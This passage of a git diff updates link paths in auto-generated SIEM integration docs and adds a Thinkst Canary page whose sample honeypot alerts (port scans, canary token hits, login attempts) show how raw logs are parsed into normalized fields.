detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "host_checker_policy_failed.json" diff --git a/_shared_content/operations_center/integrations/generated/7b1317ec-3f87-4b53-9b6d-3f79045f28fa.md b/_shared_content/operations_center/integrations/generated/7b1317ec-3f87-4b53-9b6d-3f79045f28fa.md index dc05c12977..6e1bfedf2a 100644 --- a/_shared_content/operations_center/integrations/generated/7b1317ec-3f87-4b53-9b6d-3f79045f28fa.md +++ b/_shared_content/operations_center/integrations/generated/7b1317ec-3f87-4b53-9b6d-3f79045f28fa.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_dns.json" diff --git a/_shared_content/operations_center/integrations/generated/7b75d498-4a65-4d44-aa81-31090d723a60.md b/_shared_content/operations_center/integrations/generated/7b75d498-4a65-4d44-aa81-31090d723a60.md index 934b733521..09e070e281 100644 --- a/_shared_content/operations_center/integrations/generated/7b75d498-4a65-4d44-aa81-31090d723a60.md +++ b/_shared_content/operations_center/integrations/generated/7b75d498-4a65-4d44-aa81-31090d723a60.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_email_event.json" @@ -78,6 +78,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "version": "0.0.1" }, "related": { + "hosts": [ + "HOSTNAME" + ], "ip": [ "192.168.0.1" ], @@ -91,7 +94,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "name": "Rule Name" }, "source": { - "address": "192.168.0.1", + "address": "HOSTNAME", + "domain": "HOSTNAME", "ip": "192.168.0.1" }, "user": { @@ -170,6 +174,7 @@ The following table lists the fields that are extracted, normalized under the EC |`event.end` | `date` | event.end contains the date when the event ended or when the activity was last observed. | |`event.kind` | `keyword` | The kind of the event. The highest categorization field in the hierarchy. | |`event.reason` | `keyword` | Reason why this event happened, according to the source | +|`event.severity` | `long` | Numeric severity of the event. | |`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | |`event.url` | `keyword` | Event investigation URL | |`file.name` | `keyword` | Name of the file including the extension, without the directory. | @@ -181,6 +186,7 @@ The following table lists the fields that are extracted, normalized under the EC |`rule.description` | `keyword` | Rule description | |`rule.id` | `keyword` | Rule ID | |`rule.name` | `keyword` | Rule name | +|`source.domain` | `keyword` | The domain name of the source. | |`source.ip` | `ip` | IP address of the source. | |`user.name` | `keyword` | Short name or login of the user. | |`varonis.datalert.file.old_permission` | `keyword` | The permissions before the change. Data is not collected for all event types. | diff --git a/_shared_content/operations_center/integrations/generated/80b8382e-0667-4469-bbc9-74be1e0ca1c1.md b/_shared_content/operations_center/integrations/generated/80b8382e-0667-4469-bbc9-74be1e0ca1c1.md index 4ee2444c01..b03037f3ab 100644 --- a/_shared_content/operations_center/integrations/generated/80b8382e-0667-4469-bbc9-74be1e0ca1c1.md +++ b/_shared_content/operations_center/integrations/generated/80b8382e-0667-4469-bbc9-74be1e0ca1c1.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "access_accept_event.json" diff --git a/_shared_content/operations_center/integrations/generated/80de6ccb-7246-40de-bcbb-bc830118c1f9.md b/_shared_content/operations_center/integrations/generated/80de6ccb-7246-40de-bcbb-bc830118c1f9.md index cefd6c32b6..fd3c76928c 100644 --- a/_shared_content/operations_center/integrations/generated/80de6ccb-7246-40de-bcbb-bc830118c1f9.md +++ b/_shared_content/operations_center/integrations/generated/80de6ccb-7246-40de-bcbb-bc830118c1f9.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_block_user.json" diff --git a/_shared_content/operations_center/integrations/generated/838ed6e5-6d5e-4a5b-b079-ab35ac6b2ab9.md b/_shared_content/operations_center/integrations/generated/838ed6e5-6d5e-4a5b-b079-ab35ac6b2ab9.md index 447610da87..87d7983dff 100644 --- a/_shared_content/operations_center/integrations/generated/838ed6e5-6d5e-4a5b-b079-ab35ac6b2ab9.md +++ b/_shared_content/operations_center/integrations/generated/838ed6e5-6d5e-4a5b-b079-ab35ac6b2ab9.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event.json" diff --git a/_shared_content/operations_center/integrations/generated/8461aabe-6eba-4044-ad7f-a0c39a2b2279.md b/_shared_content/operations_center/integrations/generated/8461aabe-6eba-4044-ad7f-a0c39a2b2279.md index 8ee61aece6..205f3bec3f 100644 --- a/_shared_content/operations_center/integrations/generated/8461aabe-6eba-4044-ad7f-a0c39a2b2279.md +++ b/_shared_content/operations_center/integrations/generated/8461aabe-6eba-4044-ad7f-a0c39a2b2279.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "messagetrace.json" diff --git a/_shared_content/operations_center/integrations/generated/8510051d-c7cf-4b0c-a398-031afe91faa0.md b/_shared_content/operations_center/integrations/generated/8510051d-c7cf-4b0c-a398-031afe91faa0.md index 1cb2029539..8695c64480 100644 --- a/_shared_content/operations_center/integrations/generated/8510051d-c7cf-4b0c-a398-031afe91faa0.md +++ b/_shared_content/operations_center/integrations/generated/8510051d-c7cf-4b0c-a398-031afe91faa0.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_ingest_ipv4_carp_logs.json" diff --git a/_shared_content/operations_center/integrations/generated/864ade96-a96d-4a0e-ab3d-b7cb7b7db618.md b/_shared_content/operations_center/integrations/generated/864ade96-a96d-4a0e-ab3d-b7cb7b7db618.md index d25292959d..4e095dfce4 100644 --- a/_shared_content/operations_center/integrations/generated/864ade96-a96d-4a0e-ab3d-b7cb7b7db618.md +++ b/_shared_content/operations_center/integrations/generated/864ade96-a96d-4a0e-ab3d-b7cb7b7db618.md @@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "query_log.json" diff --git a/_shared_content/operations_center/integrations/generated/890207d2-4878-440d-9079-3dd25d472e0a.md b/_shared_content/operations_center/integrations/generated/890207d2-4878-440d-9079-3dd25d472e0a.md index 319f42886a..63afcd76dd 100644 --- a/_shared_content/operations_center/integrations/generated/890207d2-4878-440d-9079-3dd25d472e0a.md +++ b/_shared_content/operations_center/integrations/generated/890207d2-4878-440d-9079-3dd25d472e0a.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_alert_failed_auth.json" diff --git a/_shared_content/operations_center/integrations/generated/89346697-b64b-45d4-a456-72fd8a2be5d8.md b/_shared_content/operations_center/integrations/generated/89346697-b64b-45d4-a456-72fd8a2be5d8.md new file mode 100644 index 0000000000..48aeb1ef66 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/89346697-b64b-45d4-a456-72fd8a2be5d8.md @@ -0,0 +1,1272 @@ + +### Event Categories + + +The following table lists the data source offered by this integration. + +| Data Source | Description | +| ----------- | ------------------------------------ | +| `Network intrusion detection system` | None | + + + + + +In details, the following table denotes the type of events produced by this integration. + +| Name | Values | +| ---- | ------ | +| Kind | `alert` | +| Category | `intrusion_detection` | +| Type | `denied` | + + + + +### Transformed Events Samples after Ingestion + +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. + +=== "test_consolidated_network_port_scan.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"Consolidated Network Port Scan\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"23\": [\"5.6.7.8\"], \"80\": [\"5.6.7.8\"], \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"5007\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "5007", + "reason": "Consolidated Network Port Scan", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8" + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + } + } + + ``` + + +=== "test_dns_canary_token.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1721315330\", \"created_std\": \"2024-07-18 15:08:50 UTC+0000\", \"description\": \"Canarytoken triggered\", \"dst_host\": \"5.6.7.8\", \"dst_port\": 53, \"canarytoken\": \"1111111111111111111111111\", \"geoip\": {\"city\": \"Paris\", \"continent_code\": \"EU\", \"country\": \"France\", \"country_code\": \"FR\", \"country_code3\": \"FRA\", \"currency_code\": \"EUR\", \"host_domain\": \"\", \"hostname\": \"\", \"ip\": \"1.2.3.4\", \"is_bogon\": false, \"is_v4_mapped\": false, \"is_v6\": false, \"latitude\": 48.859077, \"longitude\": 2.293486, \"region\": \"Ile-de-France\", \"region_code\": \"J\", \"timezone\": {\"abbr\": \"CEST\", \"date\": \"2024-07-18\", \"id\": \"Europe/Paris\", \"name\": \"Central European Summer Time\", \"offset\": \"+02:00\", \"time\": \"17:08:54.722399\"}, \"valid\": true}, \"hostname\": \"1111111111111111111111111.example.org\", \"ip_blocklist\": {\"is_proxy\": false, \"is_tor\": false, \"is_vpn\": false}, \"src_host\": \"1.2.3.4\", \"timestamp\": 1721315332, \"timestamp_std\": \"2024-07-18 15:08:52 UTC+0000\", \"type\": \"dns\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"local_time\": \"2024-07-18 15:08:50 (UTC)\", \"logtype\": \"16000\", \"matched_annotations\": {}, \"memo\": \"Integration dns\", \"name\": \"N/A\", \"node_id\": \"1111111111111111111111111\", \"notified\": \"False\", \"src_port\": \"40296\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "16000", + "dataset": "dns", + "reason": "Canarytoken triggered", + "start": "2024-07-18T15:08:50Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-18T15:08:52Z", + "destination": { + "address": "1111111111111111111111111.example.org", + "domain": "1111111111111111111111111.example.org", + "ip": "5.6.7.8", + "port": 53, + "registered_domain": "example.org", + "subdomain": "1111111111111111111111111", + "top_level_domain": "org" + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "1111111111111111111111111.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "geo": { + "city_name": "Paris", + "continent_code": "EU", + "country_iso_code": "Paris", + "timezone": "FR" + }, + "ip": "1.2.3.4", + "port": 40296 + }, + "thinkst_canary": { + "canary_token": "1111111111111111111111111", + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + } + } + + ``` + + +=== "test_ftp_login_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"FTP Login Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"PASSWORD\": \"mypasswordverysecured\", \"USERNAME\": \"jdoe\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"2000\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "2000", + "reason": "FTP Login Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user": { + "name": "jdoe" + } + } + + ``` + + +=== "test_git_repository_clone_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"Git Repository Clone Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"HOST\": \"git.example.org\", \"REPO\": \"mypreviousrepository\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"19001\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "19001", + "reason": "Git Repository Clone Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "git.example.org", + "domain": "git.example.org", + "ip": "5.6.7.8", + "port": 22, + "registered_domain": "example.org", + "subdomain": "git", + "top_level_domain": "org" + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "git.example.org", + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "repo": "mypreviousrepository" + } + } + + ``` + + +=== "test_host_port_scan.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"Host Port Scan\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"ports\": \"23,80,443\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"5002\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "5002", + "reason": "Host Port Scan", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8" + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "ports": "23,80,443" + } + } + + ``` + + +=== "test_http_api_request.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"HTTP API Request\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"HEADERS\": {\"Accept\": \"*/*\", \"Host\": \"1111111111.example.org\", \"User-Agent\": \"curl/8.7.1\"}, \"METHOD\": \"POST\", \"PATH\": \"/path/to/a/secret/\", \"USERAGENT\": \"curl/8.7.1\", \"POSTDATA\": {}, \"RESPONSE\": 200, \"HOSTNAME\": \"1111111111.example.org\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"3005\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "3005", + "reason": "HTTP API Request", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "1111111111.example.org", + "domain": "1111111111.example.org", + "ip": "5.6.7.8", + "port": 22, + "registered_domain": "example.org", + "subdomain": "1111111111", + "top_level_domain": "org" + }, + "http": { + "request": { + "method": "POST" + }, + "response": { + "status_code": 200 + } + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "1111111111.example.org", + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "url": { + "path": "/path/to/a/secret/" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "curl", + "original": "curl/8.7.1", + "os": { + "name": "Other" + }, + "version": "8.7.1" + } + } + + ``` + + +=== "test_http_canary_token.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684212\", \"created_std\": \"2024-07-11 07:50:12 UTC+0000\", \"description\": \"Canarytoken triggered\", \"dst_host\": \"5.6.7.8\", \"dst_port\": 80, \"canarytoken\": \"xxxxxxxxxxxxxxxxxxxx\", \"geoip\": {\"city\": \"Emerainville\", \"continent_code\": \"EU\", \"country\": \"France\", \"country_code\": \"FR\", \"country_code3\": \"FRA\", \"currency_code\": \"EUR\", \"host_domain\": \"\", \"hostname\": \"\", \"ip\": \"1.2.3.4\", \"is_bogon\": false, \"is_v4_mapped\": false, \"is_v6\": false, \"latitude\": 48.81276, \"longitude\": 2.62139, \"region\": \"Ile-de-France\", \"region_code\": \"J\", \"timezone\": {\"abbr\": \"CEST\", \"date\": \"2024-07-11\", \"id\": \"Europe/Paris\", \"name\": \"Central European Summer Time\", \"offset\": \"+02:00\", \"time\": \"09:50:16.622847\"}, \"valid\": true}, \"headers\": {\"Accept\": \"*/*\", \"Host\": \"1111111111.example.org\", \"User-Agent\": \"curl/8.7.1\"}, \"ip_blocklist\": {\"is_proxy\": false, \"is_tor\": false, \"is_vpn\": false}, \"request_args\": {}, \"timestamp\": 1720684212, \"timestamp_std\": \"2024-07-11 07:50:12 UTC+0000\", \"type\": \"http\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"local_time\": \"2024-07-11 07:50:12 (UTC)\", \"logtype\": \"17000\", \"matched_annotations\": {}, \"memo\": \"Link to generate alert\", \"name\": \"N/A\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_port\": \"0\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "17000", + "dataset": "http", + "reason": "Canarytoken triggered", + "start": "2024-07-11T07:50:12Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:50:12Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 80 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "geo": { + "city_name": "Emerainville", + "continent_code": "EU", + "country_iso_code": "Emerainville", + "timezone": "FR" + }, + "ip": "1.2.3.4", + "port": 0 + }, + "thinkst_canary": { + "canary_token": "xxxxxxxxxxxxxxxxxxxx", + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "curl", + "original": "curl/8.7.1", + "os": { + "name": "Other" + }, + "version": "8.7.1" + } + } + + ``` + + +=== "test_http_login_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"HTTP Login Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"METHOD\": 